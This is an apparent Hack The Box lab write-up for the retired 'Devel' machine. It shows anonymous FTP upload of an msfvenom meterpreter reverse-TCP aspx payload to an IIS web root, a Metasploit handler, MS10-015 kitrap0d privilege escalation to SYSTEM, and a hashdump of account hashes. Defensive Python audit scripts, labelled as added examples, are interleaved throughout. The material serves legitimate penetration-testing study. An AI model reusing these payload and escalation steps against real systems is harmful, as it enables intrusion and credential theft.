HTB: Devel

Welcome to my write-up for 'Devel', which is a retired machine over at Hack the Box. Full disclaimer here: I'm actually following The Cyber Mentor to kick-start my motivation and get my head back on track. It's worth noting that even though these are the 'easy' boxes, The Cyber Mentor brings up tools, techniques and background info that you may not have thought of, and that in turn promotes further self-study and development outside of the box.

So without further ado, let's start by enumerating the target IP with nmap using the following options:
-sC : runs the default script set
-sV : detects service versions where possible
-oA <filename> : saves output in all three formats (normal, grepable and XML)

#nmap -sC -sV -oA nmap 10.10.10.5
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-01 04:47 EDT
Nmap scan report for 10.10.10.5
Host is up (0.30s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 09-04-19  10:32AM                 1442 cmdasp.aspx
| 03-17-17  05:37PM                  689 iisstart.htm
| 09-04-19  07:02PM                 2836 shell.aspx
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We can see in nmap's output that port 80 looks to be running "Microsoft IIS httpd 7.5". Opening a browser and connecting to HTTP://10.10.10.5:80 confirms the presence of a web server and shows the default IIS 7 landing page.

A quick look at the page source shows the image as <img src="welcome.png">, which is the same name as the png file in the ftp directory enumerated by our nmap scan. That strongly suggests the FTP root and the web root are the same directory.

We can also see that anonymous access is possible, so we should test our ability to create and upload a file, which may then lead to executing code on the server. First I create a local html file using the echo command and upload it through ftp using the put command.

#echo "Hello Devel" > 8bit.html
#ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:user): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put 8bit.html
local: 8bit.html remote: 8bit.html
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
13 bytes sent in 0.00 secs (151.1347 kB/s)
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
09-04-19  08:04PM                   13 8bit.html
03-18-17  02:06AM       <DIR>          aspnet_client
09-04-19  10:32AM                 1442 cmdasp.aspx
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.

Next I open a browser and try to open the 8bit.html file that was just uploaded. As you can see in the following screenshot the browser has correctly displayed the contents of our uploaded file. Success!
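The security-relevant point here is that the anonymous FTP root and the IIS web root are one and the same, so anything with a server-side extension dropped over FTP becomes executable over HTTP. The following script is an added example (not code from the write-up or from any tool it uses) showing how a defender could audit such a listing: it parses the Windows_NT style `dir` output that Microsoft ftpd returns and flags script files that are not in a known-good baseline. The sample listing is copied from the `dir` output above and embedded so the script runs offline; the extension set and the `Entry` type are my own assumptions.

```python
"""Audit an IIS FTP directory listing for server-side script files.

Added example, not part of the original write-up. Parses the Windows_NT
listing format returned by Microsoft ftpd and flags files that IIS would
hand to a script engine rather than serve as static content.
"""
import re
from dataclasses import dataclass
from datetime import datetime

# Sample input: the `dir` output shown in the write-up, embedded here so the
# script runs without a network connection.
SAMPLE_LISTING = """\
09-04-19  08:04PM                   13 8bit.html
03-18-17  02:06AM       <DIR>          aspnet_client
09-04-19  10:32AM                 1442 cmdasp.aspx
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
"""

# Assumption: extensions that IIS maps to the ASP/ASP.NET handlers.
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".ashx", ".asmx"}

# One listing line: MM-DD-YY  HH:MMAM/PM  <DIR>|size  name
LINE_RE = re.compile(
    r"^(?P<date>\d{2}-\d{2}-\d{2})\s+(?P<time>\d{2}:\d{2}[AP]M)\s+"
    r"(?:(?P<dir><DIR>)|(?P<size>\d+))\s+(?P<name>.+?)\s*$"
)


@dataclass
class Entry:
    name: str
    is_dir: bool
    size: int
    modified: datetime


def parse_listing(text):
    """Return Entry objects for every listing line; FTP status lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # e.g. "226 Transfer complete." is not a directory entry
        modified = datetime.strptime(f"{m['date']} {m['time']}", "%m-%d-%y %I:%M%p")
        entries.append(Entry(m["name"], m["dir"] is not None, int(m["size"] or 0), modified))
    return entries


def flag_script_uploads(entries, baseline_names=frozenset()):
    """Return names of script files that are not in the known-good baseline."""
    flagged = []
    for e in entries:
        if e.is_dir or "." not in e.name:
            continue
        ext = "." + e.name.rsplit(".", 1)[-1].lower()
        if ext in SCRIPT_EXTENSIONS and e.name not in baseline_names:
            flagged.append(e.name)
    return flagged


if __name__ == "__main__":
    found = parse_listing(SAMPLE_LISTING)
    for name in flag_script_uploads(found):
        print(f"script file in web root: {name}")
```

Run periodically against the real listing and a baseline of the files you deployed, the same check also catches the write-up's own `8bit.aspx` the moment it lands, since the uploaded file is by definition not in the baseline.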

So what do we do with this ability? Given that we can upload and run a file, we can look at using msfvenom to create a payload in combination with metasploit. Let's get started...

As this is a Windows IIS server we can look at creating an .asp or .aspx file. But first, as my memory is so terrible, I need to find the payload for windows meterpreter reverse tcp connections. The '-l payload' option lists all payload modules, and we can grep the results as required.

#msfvenom -l payload | grep 'meterpreter/reverse'
...
windows/meterpreter/reverse_tcp         
    Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
...

Using the following options we can build up our payload:

-p windows/meterpreter/reverse_tcp : sets the payload to use
LHOST=10.10.14.7 : sets the ip to connect back to
LPORT=6666 : sets the port to connect back to
-f aspx : sets the output format to aspx
> 8bit.aspx : redirects the output to a file

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=6666 -f aspx > 8bit.aspx

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2802 bytes

Next we upload our payload via ftp, just like we did with our test html file.

ftp> put 8bit.aspx 
local: 8bit.html remote: 8bit.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
13 bytes sent in 0.00 secs (181.3616 kB/s)
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
09-04-19  08:39PM                 2838 8bit.aspx
03-18-17  02:06AM       <DIR>          aspnet_client
09-04-19  10:32AM                 1442 cmdasp.aspx
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png

And last but not least, we need to set up our local exploit handler by starting msfconsole (This is just an interface to the Metasploit Framework) and setting up the 'exploit/multi/handler'.

#msfconsole
...

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Notice that when we show options there is currently no payload listed, so we need to go ahead and set one. We'll set this to be the same as what was specified in our msfvenom payload (windows/meterpreter/reverse_tcp).

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set LHOST 10.10.14.7
LHOST => 10.10.14.7
msf5 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.7:6666 

Again, we set the LHOST and LPORT for the payload and then run it. At this point it'll listen and wait for our aspx payload to connect back.

In a browser we open the aspx file we uploaded via ftp. In my case I open http://10.10.10.5/8bit.aspx and if we monitor msfconsole we should see a meterpreter session open up.

[*] Started reverse TCP handler on 10.10.14.7:6666 
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.7:6666 -> 10.10.10.5:49176) at 2019-09-01 06:08:52 -0400

Excellent. Now check 'sysinfo' and 'getuid' from the meterpreter session.

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > getuid
Server username: IIS APPPOOL\Web

Oh dear. Looks like we've only managed to get a web account with limited privileges.

So what I learnt tonight is that metasploit has what's called "post-exploitation modules" and one of these is an exploit suggester. Perfect!

First we background our current session and then do a quick search for the exploit suggester to get the right syntax.

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester

Next we load this module with the standard 'use' command, show the options and set the session for it to run against.

msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > set session 1

Once it's all set up we can run it and have it scan the host and collect known exploits for it. How cool is that!

msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

So in our case metasploit checked a total of 29 exploits against this machine and returned a list of potential options. Feel free to experiment with one or all. I initially tried 'bypassuac_eventvwr' and then 'ms10_092_schelevator' with no success. For my third attempt I stuck to TCM's advice and used 'windows/local/ms10_015_kitrap0d'.
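From the defender's side, the suggester output above is essentially a patch-gap report: most module names embed the Microsoft bulletin they target, and the verdict tells you whether the check actually confirmed the condition. The script below is an added example (not part of the write-up or of Metasploit) that parses those `[+] host - module: verdict` lines, groups them by verdict, and extracts the bulletin IDs so they can be handed to whoever owns patching. The sample text is a subset of the output quoted above; the function names and the `MSyy-nnn` mapping rule are my own.

```python
"""Turn local_exploit_suggester output into a patch-gap triage list.

Added example, not part of the original write-up or of Metasploit.
"""
import re
from collections import defaultdict

# Constructed sample: a subset of the suggester output quoted in the write-up.
SAMPLE_OUTPUT = """\
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[*] Post module execution completed
"""

# Only [+] lines carry a result; [*] lines are progress messages.
RESULT_RE = re.compile(r"^\[\+\] (?P<host>\S+) - (?P<module>\S+): (?P<verdict>.+)$")
# Module short names that start with msYY_NNN_ refer to bulletin MSYY-NNN.
BULLETIN_RE = re.compile(r"^ms(\d{2})_(\d{3})_")


def parse_suggester(text):
    """Yield (host, module, verdict) for each [+] result line."""
    for line in text.splitlines():
        m = RESULT_RE.match(line)
        if m:
            yield m["host"], m["module"], m["verdict"].rstrip(".")


def bulletin_for(module):
    """Map e.g. exploit/windows/local/ms10_015_kitrap0d to 'MS10-015', else None."""
    m = BULLETIN_RE.match(module.rsplit("/", 1)[-1])
    return f"MS{m.group(1)}-{m.group(2)}" if m else None


def triage(text):
    """Group results by verdict: {verdict: [(module_short_name, bulletin_or_None), ...]}."""
    report = defaultdict(list)
    for _host, module, verdict in parse_suggester(text):
        report[verdict].append((module.rsplit("/", 1)[-1], bulletin_for(module)))
    return dict(report)


def missing_bulletins(text):
    """Sorted, de-duplicated bulletin IDs implied by every [+] line."""
    return sorted({b for _h, m, _v in parse_suggester(text) if (b := bulletin_for(m))})


if __name__ == "__main__":
    for verdict, modules in triage(SAMPLE_OUTPUT).items():
        print(verdict)
        for name, bulletin in modules:
            print(f"  {name:45s} {bulletin or 'config hardening, not a patch'}")
    print("bulletins to verify:", ", ".join(missing_bulletins(SAMPLE_OUTPUT)))
```

Modules that map to no bulletin (the UAC bypass here) point at a configuration weakness rather than a missing update, which is why the report keeps them in a separate column instead of dropping them.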

It's the same format as usual - first 'use' the exploit, check options, set the session and then run it.

Arghhhh.... as I've run it I can see it's listening on a completely different IP which wasn't shown when I originally ran 'options'.

msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 192.168.1.29:4444 
[*] Launching notepad to host the exploit...
[+] Process 3528 launched.
[*] Reflectively injecting the exploit DLL into 3528...
[*] Injecting exploit into 3528 ...
[*] Exploit injected. Injecting payload into 3528...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms10_015_kitrap0d) > 

If we run 'options' one more time and check again we can now see fields to specify the LHOST and LPORT, so that's what I'll do. I set my LHOST and LPORT and try again.

msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[-] Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION.
[*] Exploit completed, but no session was created.

Bugger. This time my exploit completed but no session was created. This happens sometimes so don't fret. Start your exploit/multi/handler once again and open your aspx file in the browser and we'll be back to the future in no time. Do note your session number will have incremented so be sure to update that in your options.

Okay.. we're back. This time when I ran the exploit we have success!

msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.7:6667 
[*] Launching notepad to host the exploit...
[+] Process 3780 launched.
[*] Reflectively injecting the exploit DLL into 3780...
[*] Injecting exploit into 3780 ...
[*] Exploit injected. Injecting payload into 3780...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 4 opened (10.10.14.7:6667 -> 10.10.10.5:49158) at 2019-09-01 06:55:07 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a450f6000be7df50ee304d0a838d638f:::
babis:1000:aad3b435b51404eeaad3b435b51404ee:a1133ec0f7779e215acc8a36922acf57:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > 

You can see above that when I run getuid this time I have 'NT AUTHORITY\SYSTEM'.

From here we have free rein, but for the sake of Hack The Box we can extract the two flags as needed and mark Devel as complete!
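The hashdump output is in the classic pwdump format (`user:rid:lm_hash:nt_hash:::`), and a defender reviewing such a dump from their own SAM wants a quick read of which accounts need attention first. The script below is an added example (not from the write-up or from Metasploit) that parses those lines and flags accounts with a blank password, accounts that still store an LM hash, and accounts that share the same NT hash. The sample dump is the one shown above; the two constants are the well-known hashes of the empty string, and the audit rules are my own.

```python
"""Audit a pwdump-style hash dump for weak account states.

Added example, not part of the original write-up. Parses
user:rid:lm:nt::: lines and reports what a defender should act on first.
"""
from collections import defaultdict

# LM hash of the empty string: stored when LM hashing is disabled or the
# password has no LM representation. Anything else means an LM hash exists.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty string: the account has a blank password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Sample input: the hashdump lines shown in the write-up.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a450f6000be7df50ee304d0a838d638f:::
babis:1000:aad3b435b51404eeaad3b435b51404ee:a1133ec0f7779e215acc8a36922acf57:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_dump(text):
    """Return a list of {user, rid, lm, nt} dicts; malformed lines are skipped."""
    accounts = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        accounts.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2].lower(), "nt": parts[3].lower()})
    return accounts


def audit(accounts):
    """Map user -> list of findings for accounts that have any."""
    findings = {}
    for a in accounts:
        issues = []
        if a["nt"] == EMPTY_NT:
            issues.append("blank password")
        if a["lm"] != EMPTY_LM:
            issues.append("LM hash stored (weak legacy format)")
        if issues:
            findings[a["user"]] = issues
    return findings


def shared_passwords(accounts):
    """Groups of users whose non-blank NT hashes are identical (password reuse)."""
    by_hash = defaultdict(list)
    for a in accounts:
        if a["nt"] != EMPTY_NT:
            by_hash[a["nt"]].append(a["user"])
    return [sorted(users) for users in by_hash.values() if len(users) > 1]


if __name__ == "__main__":
    accts = parse_dump(SAMPLE_DUMP)
    for user, issues in audit(accts).items():
        print(f"{user}: {', '.join(issues)}")
    for group in shared_passwords(accts):
        print("same password:", ", ".join(group))
```

On the sample the only finding is the Guest account with a blank password; the built-in Guest is disabled by default on Windows, but a dump like this is the moment to confirm that it still is.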

Exploits used:

MS10-015

Websites, Tools and Commands Used:

nmap - usage and examples
metasploit
msfvenom
meterpreter
Metasploit Post-Exploitation Module Reference
ms10_015_kitrap0d

8bit kiwi